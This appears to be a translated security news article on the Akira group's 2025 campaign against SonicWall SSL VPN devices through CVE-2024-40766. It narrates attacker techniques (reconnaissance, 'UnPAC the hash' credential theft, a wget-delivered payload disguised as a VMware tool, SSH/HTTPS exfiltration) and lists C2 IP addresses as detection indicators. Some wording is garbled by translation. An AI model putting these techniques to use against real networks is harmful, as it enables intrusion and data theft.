An organized attack campaign run by the Akira hacker group is targeting SonicWall SSL VPN devices globally as of July 2025. The group took advantage of the CVE – 2024-40766 vulnerability, which existed for over a year in the SonicWall SonicOS operating system, to infiltrate deeply into the network infrastructure of many businesses of various sectors. Investigation data showed that the attacks were conducted intentionally, using a delicate sequence of techniques ranging from log – in information collection to data theft, reflecting the level of professionalism and complex operational capabilities of the Akira team.

SonicWall VPN.png

The focus of the campaign was on the CVE – 2024-40766 vulnerability, which belongs to the group of incorrect access control flaws in the SonicWall SonicOS operating system, affecting 5th, 6th and 7th generation devices running version 7.0.1 – 5035 or earlier. Despite the announcement and release of the patch in August 2024, the vulnerability has been exploited by groups associated with Akira in a malicious code model as a service. The reuse of an old but common weakness in corporate VPN infrastructure demonstrates the attack team’s flexibility and deep understanding of the target environment, as well as its ability to take full advantage of gaps in patch management to scale the infiltration.

On August 20, 2025, Darktrace’s surveillance system detected an unusual sequence of activity originating from SonicWall SSL VPN devices. The attack began at 05: 10 international time, with reconnaissance steps being taken purposely to gather information about the network infrastructure. Hackers send a bunch of requests to endpoint mapping services, and they also use network scanning tools to identify active servers and services. Once they have the system map, they continue to move horizontally by taking advantage of Windows’ remote management service, establishing access to domain management servers and expanding control over the entire local network.

It is notable that the attacker used an advanced login information appropriation technique called “UnPAC the hash”, which exploits Kerberos’ authentication mechanism to extract NTLM hasheds from service access requests, and then re-use those hashes to move and escalate permissions within the network. Analysis showed that at least 15 sets of login information were stolen, facilitating deep – seated seizure and deployment of command – control infrastructure. After setting C2, the attacker downloads the malicious code and carries the stolen data out.

The investigative tracks show sophisticated attacks at both camouflage and exfiltration. The attacker deploys an executable rhythm packaged under the name of the legal VMware tool and sends the file to the system by wget or via remote management, then runs on the target host including ESXi to open access, collect sensitive information, and pool the data into blocks for export.

Data is transmitted outwards via encrypted channels such as SSH or HTTPS to the command control infrastructure and network analysis shows that the transmission session has a large capacity and anomalous connection from the internal hosts to external addresses such as 137.184.243.69 and 66.165.253.39, and the TLS and SSS session patterns do not match the normal behavior of the system so these are important network indicators for detecting the abnormal data transmission activities outwards. From a surveillance and investigation perspective, technical traces such as forged file names, wget commands, executable’s hash, large-capacity SSH sessions, anomalously connected PCAP records, and C2 control server addresses should be included in detection rules, log correlation analysis, and digital investigation procedures. This will quickly identify and isolate the intruder and block the flow of data.

Shortly after the first incident, researchers discovered three more incidents with the same attack characteristics, all targeting the SonicWall VPN infrastructure in the US. The fact that the CVE-2024-40766 vulnerability remains exploited despite more than a year of patches clearly reflects the vulnerability in the enterprise’s patch management. In the context that a VPN is an important gateway for remote connections to internal systems, delaying updates or skipping security patches not only facilitates malicious code penetration but also threatens the entire defense chain, leaving the organization at risk of data loss, operational disruption, and long-term reputation damage.

According to Cyber Press